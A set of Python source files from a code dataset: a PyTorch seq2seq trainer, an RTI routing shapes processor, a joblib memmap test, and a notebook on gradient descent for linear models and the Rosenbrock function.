self.construct_node_label(parent.attrib)\n graph.node(parent.attrib['id'], label=node_label)\n for child, rel in grouped[parent]:\n node_label = self.construct_node_label(child.attrib)\n graph.node(child.attrib['id'], label=node_label)\n graph.edge(parent.attrib['id'], child.attrib['id'], style=self.get_edge_style(rel), label=self.construct_edge_label(rel))\n return graph\n\n def __call__(self, parse, output='gv_output', view=True):\n graph = self.xml_to_gv(parse) if isinstance(parse, ET.ElementTree) else self.grouped_to_gv(parse)\n if output:\n graph.render(output, view=view)\n\n# def reduce_lexicon(main_lex, new_lex, key_reducer=lambda x: x.split(' ')[0]):\n# \"\"\"\n#\n# :param main_lex:\n# :param new_lex:\n# :param key_reducer:\n# :return:\n# \"\"\"\n# # for each word of the new lexicon\n# for key in new_lex:\n# # remove the internal id\n# reduced_key = key_reducer(key)\n# # if the word exists in the original lexicon\n# if reduced_key in main_lex.keys():\n# # if the assigned type has already been assigned to the word in the original lexicon\n# if new_lex[key] in main_lex[reduced_key].keys():\n# # increase each occurrence count\n# main_lex[reduced_key][new_lex[key]] += 1\n# else:\n# # otherwise add it to the lexicon\n# main_lex[reduced_key][new_lex[key]] = 1\n# # if the word does not exist in the original lexicon\n# else:\n# # init a new dictionary in the original lexicon, with this type as its only key and a single occurrence\n# main_lex[reduced_key] = {new_lex[key]: 1}","sub_path":"DS.py","file_name":"DS.py","file_ext":"py","file_size_in_byte":37683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"295962491","text":"import torch\r\nfrom torch import cuda\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.autograd import Variable\r\nfrom torch.optim.lr_scheduler import *\r\n\r\nimport numpy as np\r\nimport math\r\nimport time\r\nimport os\r\n\r\nfrom logger import Logger\r\nfrom tqdm import 
tqdm\r\n\r\nfrom data import *\r\nfrom utils import *\r\nfrom model.Seq2Seq import *\r\nfrom model.Encoder import *\r\nfrom model.Decoder import *\r\nfrom model.ProbingTasks import ProbingTasks\r\nfrom model.LabelSmoothing import *\r\nfrom bleu import *\r\n\r\nclass NoamOpt:\r\n \"Optim wrapper that implements rate.\"\r\n def __init__(self, model_size, factor, warmup, optimizer):\r\n self.optimizer = optimizer\r\n self._step = 0\r\n self.warmup = warmup\r\n self.factor = factor\r\n self.model_size = model_size\r\n self._rate = 0\r\n\r\n def step(self):\r\n \"Update parameters and rate\"\r\n self._step += 1\r\n rate = self.rate()\r\n for p in self.optimizer.param_groups:\r\n p['lr'] = rate\r\n self._rate = rate\r\n self.optimizer.step()\r\n\r\n def rate(self, step = None):\r\n \"Implement `lrate` above\"\r\n if step is None:\r\n step = self._step\r\n return self.factor * \\\r\n (self.model_size ** (-0.5) *\r\n min(step ** (-0.5), step * self.warmup ** (-1.5)))\r\n\r\n\r\n\r\nclass Trainer(object):\r\n def __init__(self, dp, args):\r\n\r\n # Language setting\r\n self.max_len = args.max_len\r\n self.args = args\r\n\r\n # Data Loader\r\n self.dp = dp\r\n if torch.cuda.is_available():\r\n if not args.cuda:\r\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\r\n\r\n self.device = torch.device(\"cuda:\" + str(args.gpu) if args.cuda else \"cpu\")\r\n\r\n # Path\r\n self.data_path = args.data_path\r\n self.sample_path = os.path.join('./samples/' + args.sample)\r\n self.log_path = os.path.join('./logs/' + args.log)\r\n\r\n if not os.path.exists(self.sample_path): os.makedirs(self.sample_path)\r\n if not os.path.exists(self.log_path): os.makedirs(self.log_path)\r\n\r\n # Hyper-parameters\r\n self.lr = args.lr\r\n self.grad_clip = args.grad_clip\r\n self.embed_dim = args.embed_dim\r\n self.hidden_dim = args.hidden_dim\r\n self.num_layer = args.num_layer\r\n\r\n # Training setting\r\n self.batch_size = args.batch_size\r\n self.num_epoch = args.num_epoch\r\n # self.iter_per_epoch = len(train_loader)\r\n\r\n # Log\r\n self.logger = open(self.log_path+'/log.txt','w')\r\n self.sample = open(self.sample_path+'/sample.txt','w')\r\n self.tf_log = Logger(self.log_path)\r\n\r\n self.pad_idx = self.dp.vocab.stoi['']\r\n\r\n self.build_model(self.dp.vocab)\r\n\r\n def pad_sequences(self, s):\r\n pad_token = self.dp.vocab.stoi['']\r\n # print(s)\r\n lengths = [len(s1) for s1 in s]\r\n longest_sent = max(lengths)\r\n\r\n padded_X = np.ones((self.args.batch_size, longest_sent), dtype=np.int64) * pad_token\r\n for i, x_len in enumerate(lengths):\r\n sequence = s[i]\r\n padded_X[i, 0:x_len] = sequence[:x_len]\r\n # print(padded_X)\r\n return padded_X\r\n\r\n def init_weights(self, m):\r\n for name, param in m.named_parameters():\r\n nn.init.uniform_(param.data, -0.08, 0.08)\r\n\r\n def build_model(self, vocabs):\r\n # build dictionaries\r\n self.vocab = self.dp.vocab\r\n # print(len(self.vocab.itos))\r\n self.encoder = Encoder(len(self.vocab.itos), self.embed_dim, self.hidden_dim, self.num_layer)\r\n self.decoder = Decoder(len(self.vocab.itos), self.embed_dim, self.hidden_dim, self.num_layer)\r\n\r\n # build the model\r\n self.model = Seq2Seq(self.encoder, self.decoder, self.device, len(self.vocab.itos)).to(self.device)\r\n for p in self.model.parameters():\r\n if p.dim() > 1:\r\n nn.init.xavier_uniform(p)\r\n\r\n if self.args.mode == 'probe':\r\n self.probe = ProbingTasks(self.encoder, self.hidden_dim, 4, 2, False).to(self.device)\r\n elif self.args.mode == 'train':\r\n self.probe = 
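The NoamOpt.rate formula is easy to sanity-check standalone; model_size=512, factor=1 and warmup=400 below are assumed example values, not necessarily this trainer's settings.

def noam_rate(step, model_size=512, factor=1.0, warmup=400):
    # same expression as NoamOpt.rate above
    return factor * model_size ** (-0.5) * min(step ** (-0.5), step * warmup ** (-1.5))

for step in (1, 100, 400, 1600, 6400):
    print(step, noam_rate(step))
# the rate grows linearly until step == warmup, where the two arguments of
# min() coincide, and decays as step ** -0.5 afterwards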
ProbingTasks(self.encoder, self.hidden_dim, 4, 2, True).to(self.device)\r\n\r\n # set the criterion and optimizer\r\n self.criterion = nn.NLLLoss(ignore_index=self.dp.vocab.stoi[''])\r\n self.criterion_ppl = nn.NLLLoss(ignore_index=self.dp.vocab.stoi[''])\r\n\r\n self.criterion2 = nn.CrossEntropyLoss()\r\n self.optimizer = optim.Adam(list(self.model.parameters()) + list(self.probe.parameters()), lr=self.lr)\r\n\r\n # self.optimizer = NoamOpt(self.model.embed_dim, 1, 400,\r\n # torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\r\n # self.optimizer = optim.Adam(list(self.model.parameters()) + list(self.probe.parameters()), lr=self.lr)\r\n\r\n self.optimizer2 = optim.Adam(self.probe.parameters(), lr=self.lr)\r\n self.scheduler = optim.lr_scheduler.StepLR(self.optimizer, 1, gamma=0.8)\r\n\r\n if torch.cuda.is_available():\r\n self.model.cuda()\r\n\r\n print(self.model)\r\n print(self.criterion)\r\n print(self.optimizer)\r\n\r\n def build_transmodel(self, vocabs):\r\n # build dictionaries\r\n self.vocab = self.dp.vocab\r\n # print(len(self.vocab.itos))\r\n self.encoder = TransEncoder(len(self.vocab.itos), self.embed_dim, self.hidden_dim, self.num_layer)\r\n self.decoder = TransDecoder(len(self.vocab.itos), self.embed_dim, self.hidden_dim, self.num_layer)\r\n\r\n # build the model\r\n self.model = TransSeq2Seq(self.encoder, self.decoder, self.device, self.embed_dim, len(self.vocab.itos)).to(self.device)\r\n self.model.apply(self.init_weights)\r\n\r\n if self.args.mode == 'probe':\r\n self.probe = ProbingTasks(self.encoder, self.hidden_dim, 4, 2, False).to(self.device)\r\n elif self.args.mode == 'train':\r\n self.probe = ProbingTasks(self.encoder, self.hidden_dim, 4, 2, True).to(self.device)\r\n\r\n # set the criterion and optimizer\r\n # self.criterion = LabelSmoothing(len(self.dp.vocab.itos), self.dp.vocab.stoi[''], 0.0)\r\n self.criterion = nn.NLLLoss(ignore_index=self.dp.vocab.stoi[''])\r\n self.criterion_ppl = nn.NLLLoss(ignore_index=self.dp.vocab.stoi[''])\r\n self.criterion2 = nn.CrossEntropyLoss()\r\n self.optimizer = optim.Adam(list(self.model.parameters()) + list(self.probe.parameters()), lr=self.lr)\r\n\r\n self.optimizer2 = optim.Adam(self.probe.parameters(), lr=self.lr)\r\n self.scheduler = optim.lr_scheduler.StepLR(self.optimizer, 1, gamma=0.8)\r\n\r\n if torch.cuda.is_available():\r\n self.model.cuda()\r\n\r\n print(self.model)\r\n print(self.criterion)\r\n print(self.optimizer)\r\n\r\n def count_parameters(self, model):\r\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\r\n\r\n def greedy_decode(self, model, src, max_len, start_symbol):\r\n with torch.no_grad():\r\n # memory = model.encoder(src)\r\n ys = (torch.ones(1, src.size(1)) * start_symbol).type_as(src.data)\r\n probs = torch.FloatTensor(torch.zeros(max_len, src.size(1), len(self.dp.vocab.itos))).to(self.device)\r\n for i in range(max_len):\r\n prob = model(src, ys, 0)\r\n _, next_word = torch.max(prob[-1, :, :], dim=-1)\r\n # print(next_word.size())\r\n next_word = next_word.data\r\n # print(next_word)\r\n probs[i] = prob[-1, :, :]\r\n ys = torch.cat([ys,\r\n torch.ones(1, src.size(1)).type_as(src.data)*next_word], dim=0)\r\n return ys, probs\r\n\r\n def evaluate(self):\r\n self.model.eval()\r\n start_time = time.time()\r\n epoch_loss = 0\r\n epoch_loss_ppl = 0\r\n num_batches = len(self.dp.val_src)//self.args.batch_size\r\n epoch_bleu = 0\r\n epoch_sentlen = 0\r\n epoch_wp = 0\r\n tgt = []\r\n pred = []\r\n with torch.no_grad():\r\n for i in range(num_batches):\r\n # hidden = 
self.model.encoder.init_hidden(self.args.batch_size)\r\n src = self.pad_sequences(self.dp.val_src[i*self.args.batch_size : (i+1)*self.args.batch_size])\r\n tgt = self.pad_sequences(self.dp.val_tgt[i*self.args.batch_size : (i+1)*self.args.batch_size])\r\n lng = self.dp.val_tgtlng[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n sentlen = self.dp.val_src_sentlen[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n word_pairs = self.dp.val_word_pair[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n word_pairs_y = self.dp.val_word_pair_y[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n\r\n src = torch.LongTensor(src).to(self.device).transpose(0, 1)\r\n tgt = torch.LongTensor(tgt).to(self.device).transpose(0, 1)\r\n lng = torch.LongTensor(lng).to(self.device)\r\n sentlen = torch.LongTensor(sentlen).to(self.device)\r\n word_pairs = torch.LongTensor(word_pairs).to(self.device)\r\n word_pairs_y = torch.LongTensor(word_pairs_y).to(self.device)\r\n\r\n\r\n output, logits = self.greedy_decode(self.model, src, tgt[1:, :].size(0), self.dp.vocab.stoi[''])\r\n # sentlen_out, wp_out = self.probe(src, lng, word_pairs)\r\n # loss_syn1 = self.criterion2(sentlen_out, sentlen)\r\n # loss_syn2 = self.criterion2(wp_out, word_pairs_y)\r\n\r\n output_ = logits.view(-1, logits.shape[-1])\r\n # print(tgt[1:, :].size())\r\n # print(logits.size())\r\n tgt_ = (tgt[1:, :]).contiguous().view(-1)\r\n loss = self.criterion(output_, tgt_)\r\n # loss /= (output.size(0)*output.size(1))\r\n epoch_loss_ppl += self.criterion_ppl(output_, tgt_).item()\r\n epoch_loss += loss.item()\r\n # epoch_sentlen += loss_syn1.item()\r\n # epoch_wp += loss_syn2.item()\r\n\r\n pred_sents = []\r\n trg_sents = []\r\n output = output[:].transpose(0, 1)\r\n tgt = tgt.transpose(0, 1)\r\n # print(output.size())\r\n # print(tgt.size())\r\n\r\n for j in range(self.args.batch_size):\r\n # print(output.size())\r\n pred_sent = self.get_sentence(output[j, 1:].data.cpu().numpy().tolist(), 'tgt')\r\n trg_sent = self.get_sentence(tgt[j, 1:].data.cpu().numpy().tolist(), 'tgt')\r\n pred_sents.append(pred_sent)\r\n trg_sents.append(trg_sent)\r\n if i == 1:\r\n print('Pred: ' + str(' '.join(pred_sent)))\r\n print('Target: ' + str(' '.join(trg_sent)))\r\n epoch_bleu += get_bleu(pred_sents, trg_sents)\r\n message = \"Val loss: %1.3f val_bleu: %1.3f , val_ppl: %4.3f, val_sentlen: %1.3f, val_wp: %1.3f, elapsed: %1.3f \" % (\r\n epoch_loss/num_batches, epoch_bleu/num_batches, np.exp(epoch_loss_ppl/num_batches), epoch_sentlen/num_batches, epoch_wp/num_batches, time.time() - start_time)\r\n print(message)\r\n\r\n return epoch_bleu/num_batches\r\n\r\n def train(self):\r\n self.best_bleu = .0\r\n patience = 0\r\n print(f'The model has {self.count_parameters(self.model):,} trainable parameters')\r\n\r\n for epoch in range(1, self.num_epoch):\r\n #self.scheduler.step()\r\n\r\n self.train_loss = 0\r\n self.train_loss_ppl = 0\r\n self.train_bleu = 0\r\n self.train_sentlen = 0\r\n self.train_wp = 0\r\n start_time = time.time()\r\n\r\n num_batches = len(self.dp.train_src)//self.args.batch_size\r\n\r\n for i in tqdm(range(num_batches)):\r\n self.model.train()\r\n # hidden = self.model.encoder.init_hidden(self.args.batch_size)\r\n src = self.pad_sequences(self.dp.train_src[i*self.args.batch_size : (i+1)*self.args.batch_size])\r\n tgt = self.pad_sequences(self.dp.train_tgt[i*self.args.batch_size : (i+1)*self.args.batch_size])\r\n tgtlng = self.dp.train_tgtlng[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n srclng = 
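The np.exp(epoch_loss_ppl / num_batches) expression in evaluate() is the usual perplexity definition, exp of the mean per-token negative log-likelihood, as a two-line check shows:

import numpy as np

V = 1000                      # pretend vocabulary size
mean_nll = -np.log(1.0 / V)   # NLL of a uniform prediction over V tokens
print(np.exp(mean_nll))       # ~1000.0: perplexity of uniform guessing equals V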
self.dp.train_srclng[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n sentlen = self.dp.train_src_sentlen[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n word_pairs = self.dp.train_word_pair[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n word_pairs_y = self.dp.train_word_pair_y[i*self.args.batch_size : (i+1)*self.args.batch_size]\r\n\r\n # import pdb; pdb.set_trace();\r\n src = torch.LongTensor(src).to(self.device).transpose(0, 1)\r\n tgt = torch.LongTensor(tgt).to(self.device).transpose(0, 1)\r\n\r\n tgtlng = torch.LongTensor(tgtlng).to(self.device)\r\n srclng = torch.LongTensor(srclng).to(self.device)\r\n sentlen = torch.LongTensor(sentlen).to(self.device)\r\n word_pairs = torch.LongTensor(word_pairs).to(self.device)\r\n word_pairs_y = torch.LongTensor(word_pairs_y).to(self.device)\r\n # print(src.size())\r\n self.optimizer.zero_grad()\r\n self.model.zero_grad()\r\n self.encoder.zero_grad()\r\n self.decoder.zero_grad()\r\n # print(src[:, 0])\r\n # print(tgt[:, 0])\r\n # print(tgt[:-1, 0])\r\n # print(tgt[1:, 0])\r\n output = self.model(src, tgt[:-1, :], tgtlng)\r\n\r\n # sentlen_out, wp_out = self.probe(src, srclng, word_pairs)\r\n # loss_syn1 = self.criterion2(sentlen_out, sentlen)\r\n # loss_syn2 = self.criterion2(wp_out, word_pairs_y)\r\n\r\n # loss_syn = loss_syn1 + loss_syn2\r\n\r\n output_ = output.view(-1, output.shape[-1])\r\n # print(output.size())\r\n # print(tgt.size())\r\n # print(tgt[1:, :].size())\r\n tgt_ = (tgt[1:, :]).contiguous().view(-1)\r\n\r\n loss = self.criterion(output_, tgt_)\r\n # loss /= (output.size(0)*output.size(1))\r\n\r\n loss_ppl = self.criterion_ppl(output_, tgt_)\r\n self.train_loss_ppl += loss_ppl.item()\r\n if self.args.mode == 'train':\r\n loss = loss + loss_syn\r\n\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.grad_clip)\r\n\r\n self.optimizer.step()\r\n self.train_loss += loss.item()\r\n\r\n # if self.args.mode == 'probe':\r\n # self.optimizer2.zero_grad()\r\n # loss_syn.backward()\r\n # self.optimizer2.step()\r\n\r\n # self.train_sentlen += loss_syn1.item()\r\n # self.train_wp += loss_syn2.item()\r\n\r\n pred_sents = []\r\n trg_sents = []\r\n output = output.transpose(0, 1)\r\n tgt = tgt.transpose(0, 1)\r\n\r\n for j in range(self.args.batch_size):\r\n pred_sent = self.get_sentence(output[j].data.cpu().numpy().argmax(axis=-1).tolist(), 'tgt')\r\n trg_sent = self.get_sentence(tgt[j, 1:].data.cpu().numpy().tolist(), 'tgt')\r\n pred_sents.append(pred_sent)\r\n trg_sents.append(trg_sent)\r\n bleu_value = get_bleu(pred_sents, trg_sents)\r\n self.train_bleu += bleu_value\r\n\r\n if i%self.args.log_interval == 0 and i>0:\r\n message = \"Train epoch: %d iter: %d train loss: %1.3f train_bleu: %1.3f , train_ppl: %4.3f, train_sentlen: %1.3f, train_wp: %1.3f, elapsed: %1.3f \" % (\r\n epoch, i, self.train_loss/self.args.log_interval, self.train_bleu/self.args.log_interval, np.exp(self.train_loss_ppl/self.args.log_interval), self.train_sentlen/self.args.log_interval, self.train_wp/self.args.log_interval,time.time() - start_time)\r\n print(message)\r\n self.train_loss = 0\r\n self.train_bleu = 0\r\n self.train_loss_ppl = 0\r\n self.train_sentlen = 0\r\n self.train_wp = 0\r\n start_time = time.time()\r\n\r\n val_bleu = self.evaluate()\r\n if val_bleu > self.best_bleu:\r\n self.best_bleu = val_bleu\r\n torch.save(self.model, 'models/model_' + self.args.mode + '.pb')\r\n patience = 0\r\n else:\r\n patience +=1\r\n # if patience > 3:\r\n # break\r\n\r\n def get_sentence(self, sentence, side):\r\n def 
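The update in train() follows the canonical PyTorch order — zero the gradients, run backward, clip the global gradient norm, then step. A minimal self-contained version of that sequence, with a dummy model and data:

import torch

model = torch.nn.Linear(4, 1)
opt = torch.optim.Adam(model.parameters(), lr=1e-3)
x, y = torch.randn(8, 4), torch.randn(8, 1)

opt.zero_grad()
loss = torch.nn.functional.mse_loss(model(x), y)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)  # same call as in train()
opt.step()
print(loss.item())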
_eos_parsing(sentence):\r\n # if '' in sentence:\r\n # return sentence[:sentence.index('')+1]\r\n # else:\r\n return sentence\r\n\r\n # index sentence to word sentence\r\n sentence = [self.dp.vocab.itos[s] for s in sentence]\r\n\r\n return _eos_parsing(sentence)\r\n\r\n\r\n def print_train_result(self, epoch, train_iter, start_time):\r\n mode = (\"================================= Train ====================================\")\r\n print (mode, '\\n')\r\n self.logger.write(mode+'\\n')\r\n self.sample.write(mode+'\\n')\r\n\r\n message = \"Train epoch: %d iter: %d train loss: %1.3f train bleu: %1.3f elapsed: %1.3f \" % (\r\n epoch, train_iter, self.train_loss.avg, self.train_bleu.avg, time.time() - start_time)\r\n print (message, '\\n\\n')\r\n self.logger.write(message+'\\n\\n')\r\n\r\n\r\n def print_valid_result(self, epoch, train_iter, val_bleu, start_time):\r\n mode = (\"================================= Validation ====================================\")\r\n print (mode, '\\n')\r\n self.logger.write(mode+'\\n')\r\n self.sample.write(mode+'\\n')\r\n\r\n message = \"Train epoch: %d iter: %d train loss: %1.3f train_bleu: %1.3f val bleu score: %1.3f elapsed: %1.3f \" % (\r\n epoch, train_iter, self.train_loss.avg, self.train_bleu.avg, val_bleu, time.time() - start_time)\r\n print (message, '\\n\\n' )\r\n self.logger.write(message+'\\n\\n')\r\n\r\n\r\n def print_sample(self, batch_size, epoch, train_iter, source, target, pred):\r\n\r\n def _write_and_print(message):\r\n for x in message:\r\n self.sample.write(x+'\\n')\r\n print ((\" \").join(message))\r\n\r\n random_idx = randomChoice(batch_size)\r\n src_sample = self.get_sentence(tensor2np(source)[random_idx], 'src')\r\n trg_sample = self.get_sentence(tensor2np(target)[random_idx], 'trg')\r\n pred_sample = self.get_sentence(tensor2np(pred[random_idx]).argmax(axis=-1), 'trg')\r\n\r\n src_message = [\"Source Sentence: \", (\" \").join(src_sample), '\\n']\r\n trg_message = [\"Target Sentence: \", (\" \").join(trg_sample), '\\n']\r\n pred_message = [\"Generated Sentence: \", (\" \").join(pred_sample), '\\n']\r\n\r\n message = \"Train epoch: %d iter: %d \" % (epoch, train_iter)\r\n self.sample.write(message+'\\n')\r\n _write_and_print(src_message)\r\n _write_and_print(trg_message)\r\n _write_and_print(pred_message)\r\n self.sample.write('\\n\\n\\n')\r\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":19653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"624598580","text":"import os\nimport sys\nimport time\n\nsys.path.insert(0, os.path.abspath('..'))\n\nfrom rti.routing import proc\n\nclass ShapesProcessor(proc.Processor):\n def __init__(self, route, properties):\n pass\n\n def on_data_available(self, route):\n # Use squares as 'leading' input. 
For each Square instance, get the\n # equivalent instance from the Circle topic\n squares = route.inputs[\"Square\"].read()\n for shape in squares:\n if shape.valid_data:\n # read equivalent existing instance in the Circles Topic\n\n selector = dict(instance=shape.info['instance_handle'])\n circles = route.outputs['Circle'].read(selector)\n if len(circles) != 0 and circles[0].valid_data :\n shape.data['shapesize'] = circles[0].data['y']\n\n route['Triangle'].write(shape.data)\n else:\n # propagate dispose/unregister instance\n route['Triangle'].write(shape)\n # clear cache\n route['Square'].take(dict(instance=shape.info['instance_handle']))\n\n\n#3) In Connector we have for square in squares.valid_data_iter: so you don’t have to check if square.valid_data.","sub_path":"plugins/processors/pyprocessor/example/shapes_proc.py","file_name":"shapes_proc.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"202314350","text":"\nfrom multiprocessing import freeze_support,Pool\nimport time\n\nclass C1(object):\n def __init__(self,visitor):\n self.counter=0\n self.visitor=visitor\n\n def accept(self,i):\n self.visitor.visit(self)\n print(self.counter, \":C1计数\",id(self.visitor))\n\nclass Vistor(object):\n def __init__(self):\n self.counter=0\n def visit(self,ele):\n self.counter+=1\n #ele.counter+=1\n print('----exec done:',self.counter)\n\nif __name__ == '__main__':\n import tempfile\n import os\n import numpy as np\n from joblib import load, dump\n\n large_array = np.ones(int(1e6))\n temp_folder = tempfile.mkdtemp()\n filename = os.path.join(temp_folder, 'joblib_test.mmap')\n if os.path.exists(filename): os.unlink(filename)\n _ = dump(large_array, filename)\n large_memmap = load(filename, mmap_mode='r+')\n\n","sub_path":"tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"625788745","text":"# coding: utf-8\n\n# # L1 - Градиентый спуск и линейные модели\n\n# In[1]:\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.optimize import minimize\nimport math\n\nget_ipython().magic('matplotlib notebook')\nmatplotlib.rcParams['figure.figsize'] = '12,8'\nmatplotlib.rcParams['figure.max_open_warning'] = False\n\n\n# In[2]:\n\ndef setup_plot_figure(xlabel='x', ylabel='y', hline=False, vline=False, equal_axes=False):\n f = plt.figure()\n if equal_axes:\n plt.axis('equal')\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.grid(True, which='both')\n if hline:\n plt.axhline(color='k', alpha=0.7)\n if vline:\n plt.axvline(color='k', alpha=0.7)\n return f\n\n\n# In[5]:\n\nSAMPLE_NUM = 10000\n\npositive_class_features = np.random.normal(-1, 1, (SAMPLE_NUM, 2))\nnegative_class_features = np.random.normal(1.7, 1, (SAMPLE_NUM, 2))\n\nX = np.c_[np.ones(SAMPLE_NUM * 2), np.concatenate((positive_class_features, negative_class_features))]\nY = np.r_[np.ones(SAMPLE_NUM), -np.ones(SAMPLE_NUM)].reshape(SAMPLE_NUM * 2)\n\nw_exact = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)\n\nx_ax = np.linspace(-5, 5, 2)\ny_ax_exact = np.array(-(w_exact[0] + w_exact[1] * x_ax) / w_exact[2])\n\nsetup_plot_figure(hline=True, vline=True, equal_axes=True)\nplt.scatter(positive_class_features[:, 0], positive_class_features[:, 1], c='green', alpha=0.2)\nplt.scatter(negative_class_features[:, 0], negative_class_features[:, 1], c='red', 
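The joblib pattern in the test script's __main__ block above works because load(..., mmap_mode='r+') returns a numpy.memmap view of the dumped file rather than an in-RAM copy, which is what makes the array cheap to share with worker processes. A small self-contained check (the temp path is created on the fly):

import os, tempfile
import numpy as np
from joblib import dump, load

fn = os.path.join(tempfile.mkdtemp(), 'demo.mmap')
dump(np.arange(10.0), fn)
mm = load(fn, mmap_mode='r+')
print(type(mm).__name__, mm[:3])    # memmap [0. 1. 2.]
mm[0] = 42.0                        # with 'r+', writes go through to the file
print(load(fn, mmap_mode='r')[0])   # 42.0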
alpha=0.2)\nplt.plot(x_ax, y_ax_exact, color='b')\nplt.show()\n\n# Две матрицы размеров $a\\times b$ и $b \\times c$ перемножаются за $O(abc)$ операций ($a\\cdot c$ ячеек в новой таблице, на получение каждой требуется $b$ операций), матрица $a \\times a$ оборачивается за $O(a^3)$ операций, $a \\times b$ транспонируется за $O(ab)$. Зная это, а также считая, что входная выборка имеет размер $n$ и $m$ параметров, получаем следующую асимптотику за счёт выполнения последовательно пяти операций: транспонирования матрицы $X$ умножения матриц $X_{m\\times n}^T$ и $X_{n\\times m}$, обращения получившейся матрицы $m\\times m$, умножения обращённой матрицы $m\\times m$ и $X_{m\\times n}^T$ и умножения матриц $m\\times n$ и $Y_{n \\times 1}$. Тогда\n# $$O(m\\cdot n)+O(m\\cdot n \\cdot m)+O(m^3)+O(m\\cdot m \\cdot n)+O(m\\cdot n)=O(m^2n)+O(m^3).$$ Если считать, что $m$f(x, y) = (1-x)^2 + 100(y-x^2)^2$.\n\n# In[11]:\n\ndef rosenbrock(x):\n return (1 - x[0]) ** 2 + 100 * (x[1] - x[0] ** 2) ** 2\n\n\ndef rosenbrock_grad(x):\n return np.array([-2 * (1 - x[0]) - 400 * x[0] * (-x[0] ** 2 + x[1]), 200 * (-x[0] ** 2 + x[1])])\n\n\nxx = np.arange(-20, 20, 0.1)\nyy = np.arange(-20, 20, 0.1)\nxgrid, ygrid = np.meshgrid(xx, yy)\nzgrid = rosenbrock((xgrid, ygrid))\nfig = setup_plot_figure()\nax = fig.gca(projection='3d')\ncont = ax.plot_surface(xgrid, ygrid, zgrid, norm=matplotlib.colors.LogNorm(), cmap=plt.cm.jet, linewidth=0, shade=False)\nfig.colorbar(cont, shrink=0.5, aspect=5)\nstart_ros = np.random.randn(2) * 20\nres_rosenbrock = grad_descent(start_ros, rosenbrock, rosenbrock_grad, 1e-5, 5000)[2]\nz_ros = rosenbrock(res_rosenbrock.T)\nax.plot(xs=res_rosenbrock.T[0], ys=res_rosenbrock.T[1], zs=z_ros)\nfig.show()\n\n\n# 1. См. ячейку выше.\n# 2. Можно заметить, что функция имеет участок с почти нулевым градиентом — «долину», но вне этой долины эта функция очень быстро растёт, поэтому при малых фиксированных $\\lambda$ функция будет очень медленно сходиться, а при больших — расходиться, при этом градиент будет вновь быстро расти. Также в окрестности глобального минимума («долине») алгоритм будет двигаться в сторону глобального минимума очень медленно из-за близкого к нулю градиента.\n# \n# 3. Можно изменять скорость обучения динамически одним из множества способов, например, описанных ниже. Можно также стартовать алгоритм достаточно большое раз со случайными параметрами и затем выбрать лучший. 
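A quick central-difference check that rosenbrock_grad above is indeed the gradient of f(x, y) = (1-x)^2 + 100(y-x^2)^2:

def num_grad(f, x, h=1e-6):
    # central finite differences, one coordinate at a time
    g = np.zeros_like(x)
    for k in range(len(x)):
        e = np.zeros_like(x)
        e[k] = h
        g[k] = (f(x + e) - f(x - e)) / (2 * h)
    return g

pt = np.array([0.3, -1.2])
print(rosenbrock_grad(pt))       # analytic gradient
print(num_grad(rosenbrock, pt))  # numeric; the two should agree to ~1e-4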
Ещё есть вариант с нормализацией градиента (вообще говоря, длину также можно задавать), чтобы на каждой итерации мы двигались в направлении уменьшения функции, но одинаковыми шагами.\n\n# In[7]:\n\ndef mse_loss(w, x, y):\n return (1 / x.shape[0]) * np.sum((x.dot(w) - y) ** 2)\n\n\ndef mse_grad(w, x, y):\n return (2 / x.shape[0]) * x.T.dot(x.dot(w) - y)\n\n\n# In[8]:\n\nstart_2d = np.random.randn(3) * 10\nsol_mse = grad_descent(start_2d, lambda w: mse_loss(w, X, Y), lambda w: mse_grad(w, X, Y), 0.01, 300)\nyy = np.array(-(sol_mse[0][0] + sol_mse[0][1] * x_ax) / sol_mse[0][2])\nsetup_plot_figure(hline=True, vline=True, equal_axes=True)\nplt.scatter(positive_class_features.T[0], positive_class_features.T[1], c='green', alpha=0.2)\nplt.scatter(negative_class_features.T[0], negative_class_features.T[1], c='red', alpha=0.2)\nplt.plot(x_ax, yy.T, color='b', label='Gradient descent')\nplt.plot(x_ax, y_ax_exact.T, color='black', label='Exact solution')\nplt.legend()\nplt.show()\nprint('Difference between solutions norm:', np.linalg.norm(sol_mse[0] - w_exact))\n\n\n# **Метод наискорейшего спуска**\n\n# In[15]:\n\ndef grad_descent_accel(x0, func, grad, iter_num):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n for i in range(iter_num):\n q = func(x0)\n costs[i] = q\n steps[i] = x0\n g = grad(x0)\n learn_rate = minimize(lambda l: func(x0 - l * g), x0=np.zeros((1,))).x\n x0 -= learn_rate * g\n return x0, costs, steps\n\n\n# In[16]:\n\nsol_mse_accel = grad_descent_accel(start_2d, lambda w: mse_loss(w, X, Y), lambda w: mse_grad(w, X, Y), 300)\nsetup_plot_figure('Number of iterations', 'Loss')\nplt.plot(sol_mse[1], color='black', label='Simple descent')\nplt.plot(sol_mse_accel[1], color='green', label='Accelerated 